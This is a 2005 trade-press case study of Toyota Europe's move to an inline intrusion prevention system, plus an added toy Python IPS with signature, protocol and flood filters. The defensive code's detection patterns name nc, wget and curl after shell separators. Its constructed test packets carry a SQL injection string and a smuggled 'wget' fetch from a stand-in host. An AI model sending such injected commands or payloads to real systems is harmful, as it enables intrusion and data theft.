An intrusion prevention system can identify and remove risky traffic before it can do harm. In this case study, Helen Beckett finds out how it works in practice for Toyota
While software, router and anti-virus suppliers work out how to deliver end-to-end security that is easy to use, car maker Toyota has taken up an alternative technology that reduces security risk. "Intrusion prevention system means we sleep easier at night," said Richard Cross, European IS security officer at Toyota Europe.
Toyota takes a pragmatic view of security. "We are not a bank or Nato. I work out a figure of how much I should spend on security per vehicle produced, according to risk," said Cross. He has concluded that removing risky traffic from the network is a far more cost-effective strategy than trying to achieve zero vulnerability on every client and server.
"There's a very high management overhead in securing every desktop and server because you have to rely on the skill and diligence of an army of system administrators." In effect, Cross's team feels held to ransom every time Microsoft issues a batch of patches, because it can do nothing else until the task is completed. It is also time-consuming. "If one server breaks down during the distribution of patches then it is a flawed process."
By contrast, an intrusion prevention system (IPS) reduces the risk of a breach by dropping malicious traffic before it reaches the destination device or server. An evolution of intrusion detection, an IPS sits inline at the gateway, in the traffic path, rather than passively sniffing a copy of the traffic as a detection system does. It analyses each packet and can discard, not merely report, those that match an attack signature, misuse a protocol, or form a repeated pattern such as a flood. Blocked packets are dropped and the event is logged.
Cross was impressed by the "prevention rather than cure" philosophy when he surveyed the market to upgrade Toyota Europe's security provision. The manufacturer's plants operate around the clock, and parts and materials are requested from suppliers when needed, so the wide area network must always be available. Constant availability is also necessary for Toyota's Brussels local area network, where the company hosts its enterprise applications, including Oracle Financial and Enterprise Resource Planning software.
Central to Toyota's business success is a just-in-time strategy that entails being closely networked with an extensive supply chain. The supply chain is intrinsic to Toyota's manufacturing business but introduces new levels of security risk. "We simply cannot tolerate a single network outage due to a denial of service, flood or other cyber attack," said Cross.
Cross therefore classified Toyota's various network segments as high-, medium- or low-risk zones, depending on whether each is managed internally or by a third party. "We use a lot of parts suppliers and designers. While we have a great deal of respect for what they produce, we have no idea how their networks are managed."
Cross researched security systems from TippingPoint, Cisco, Symantec, McAfee and ISS. He settled on TippingPoint, a product from a division of 3Com, because, "It was the simplest to deploy and manage because they're standards-based and can inter-operate with all kinds of hardware.
"We have found that having a cohesive layer of IPS removes a lot of the rubbish on the network before it reaches the server." Toyota Europe initially installed TippingPoint to filter incoming traffic from a high-risk network zone and recorded a 60% drop in the level of disruptive activity entering the network. As a result, it is rolling the IPS out as the first layer of security at the gateway to its medium-risk network segments too.
The success of blocking malicious traffic has also encouraged Toyota to install the IPS as a sentinel at its headquarters' internet gateway, effectively the boundary firewall. Regardless of the number of filters enabled or the volume of traffic, packets pass through the IPS at wire speed with a quoted latency of under 215 microseconds, so Toyota Europe's applications run without noticeable delay while being transparently and automatically protected from threats.
Cross gave the example of an employee who travels to Switzerland, picks up a virus on his laptop, and then returns and plugs it in inside the firewall. "There's an outstanding chance that something could go wrong." Either the anti-virus signatures or the personal firewall could fail. Because the IPS is integrated with the security management system, it raises an alert as soon as the infected machine's traffic hits the network. "We get a good idea what the source of the problem is and also the kind of virus. Plus we can track the traffic to a particular segment of the network and even the device," said Cross.
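The filtering described earlier (signature, protocol anomaly and repeated-pattern checks applied inline) and the infected-laptop scenario above, as an added example that is not TippingPoint's or Toyota's code: a toy inline filter in Python that applies a payload signature, an HTTP request-line anomaly check and a per-source rate filter, and on every drop raises an alert naming the source address, the risk zone it falls in and, where the inventory knows it, the device. The zone table, device inventory, signatures, thresholds, addresses and packets are all constructed for the example; the signature patterns are illustrative, not a real filter set.

```python
"""Toy inline IPS: an added example, not TippingPoint or Toyota code.
A "drop" verdict means the packet never reaches its destination; it carries an alert naming
the source, its risk zone and, if inventoried, the device. All data below is constructed."""
from collections import defaultdict, deque
from dataclasses import dataclass, field
import ipaddress
import re

@dataclass
class Packet:
    src: str
    dst: str
    dport: int
    payload: bytes
    ts: float                                   # arrival time in seconds

# Hypothetical zone table: internally managed LAN is low risk, third-party networks high.
ZONES = {
    ipaddress.ip_network("10.10.0.0/16"): ("hq-lan", "low"),
    ipaddress.ip_network("172.16.0.0/12"): ("supplier-vpn", "high"),
}
DEVICES = {"10.10.4.23": "laptop-travel-07"}  # hypothetical inventory: address -> device
SIGNATURES = {                                 # illustrative payload patterns, not a real filter set
    "sql-union-select": re.compile(rb"union\s+(?:all\s+)?select", re.I),
    "shell-cmd-injection": re.compile(rb"(?:;|\|\|?|&&)\s*(?:cat|nc|wget|curl)\s", re.I),
}
# Protocol check: traffic to the web port must open with a well-formed HTTP request line.
HTTP_REQ_LINE = re.compile(rb"^(?:GET|POST|HEAD) [^ \r\n]{1,2048} HTTP/1\.[01]\r\n")

@dataclass
class Verdict:
    action: str                                 # "pass" or "drop"
    reason: str = ""
    alert: dict = field(default_factory=dict)

class InlineIPS:
    """Rate, signature and protocol-anomaly filters applied to every packet, in that order."""

    def __init__(self, flood_threshold=20, window=1.0):
        self.flood_threshold = flood_threshold  # packets per source per window before dropping
        self.window = window                    # seconds
        self._recent = defaultdict(deque)       # src -> arrival times inside the window

    @staticmethod
    def zone_of(addr):
        ip = ipaddress.ip_address(addr)
        for net, info in ZONES.items():
            if ip in net:
                return info
        return ("unknown", "high")              # unmapped networks are treated as high risk

    def _alert(self, pkt, reason):
        zone, risk = self.zone_of(pkt.src)
        return {"reason": reason, "src": pkt.src, "dst": pkt.dst, "dport": pkt.dport,
                "zone": zone, "risk": risk, "device": DEVICES.get(pkt.src, "unknown")}

    def inspect(self, pkt):
        # 1. Rate filter: repeated packets from one source inside the window (flood or scan).
        recent = self._recent[pkt.src]
        recent.append(pkt.ts)
        while recent and pkt.ts - recent[0] > self.window:
            recent.popleft()
        if len(recent) > self.flood_threshold:
            return Verdict("drop", "flood", self._alert(pkt, "flood"))
        # 2. Signature filter on the payload.
        for name, rx in SIGNATURES.items():
            if rx.search(pkt.payload):
                return Verdict("drop", name, self._alert(pkt, name))
        # 3. Protocol anomaly: something other than HTTP pushed at the web port.
        if pkt.dport == 80 and not HTTP_REQ_LINE.match(pkt.payload):
            return Verdict("drop", "http-anomaly", self._alert(pkt, "http-anomaly"))
        return Verdict("pass")

def run_scenario():
    """Constructed traffic: supplier-zone web requests, then an infected inside laptop scanning."""
    sup, erp = "172.16.5.9", "10.10.1.1"
    packets = [
        Packet(sup, erp, 80, b"GET /parts/status HTTP/1.1\r\nHost: erp\r\n\r\n", 0.0),
        Packet(sup, erp, 80, b"GET /parts?id=1 UNION SELECT user,pw FROM accounts HTTP/1.1\r\n\r\n", 0.1),
        Packet(sup, erp, 80, b"\x00\x01\x02junk", 0.2),
        Packet(sup, erp, 80, b"POST /api HTTP/1.1\r\n\r\nname=x; wget http://203.0.113.5/x", 0.3),
    ]
    # A worm on the returning laptop probes 30 internal hosts on SMB within 0.3 seconds.
    packets += [Packet("10.10.4.23", f"10.10.7.{i + 1}", 445, b"", 1.0 + i * 0.01) for i in range(30)]
    ips, passed, dropped, first_alerts = InlineIPS(), 0, 0, {}
    for pkt in packets:
        v = ips.inspect(pkt)
        if v.action == "pass":
            passed += 1
        else:
            dropped += 1
            first_alerts.setdefault(v.reason, v.alert)   # first alert per reason
    return passed, dropped, first_alerts

if __name__ == "__main__":
    passed, dropped, alerts = run_scenario()
    print(f"passed={passed} dropped={dropped}")
    for reason, a in alerts.items():
        print(f"{reason}: src={a['src']} zone={a['zone']}({a['risk']}) device={a['device']}")
```

Running the script shows the two halves of the article's argument in one pass: the supplier-zone requests that carry an injection payload or malformed HTTP are dropped at the gateway before the ERP host sees them, and the laptop's SMB probing is let through only until it exceeds the per-source rate, after which every further probe is dropped and the alert points at the internal segment and the inventoried device. Note that the rate filter runs before the signature filter deliberately: under a flood, the cheapest check should reject packets first so the more expensive pattern matching is not itself the bottleneck.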
The aspect that surprised Cross most about the IPS from TippingPoint was its accuracy. "We are incredibly suspicious of marketing speak - but it does everything it says on the tin. It doesn't remove legitimate traffic, but just takes out all the crud." Accuracy matters more for an inline device than for a detector: a false positive on an intrusion detection system is a spurious alert, whereas on an IPS it is a dropped legitimate packet, which for a just-in-time operation is a self-inflicted outage.
Having the equivalent of a traffic cop patrolling the network is an important addition to Toyota's security defences. Cross feels the traditional reliance on passwords, patching and authentication is insufficient. As a minimum he would look for a single management console for all security information, plus authentication of the device and user. "Passwords are not good enough in a large enterprise with multiple access points. Their lifespan of reliability has expired."
Greatly reduced management overhead is a knock-on effect of using intrusion prevention. Cross and his team spend about one hour a week looking at the logs. Managing six IPS gateways is a lot more practicable than overseeing a patching regime that aims to achieve "zero vulnerability". Cross still does his patching routines, but at a frequency that suits him, rather than being held hostage to fortune.
This was first published in November 2005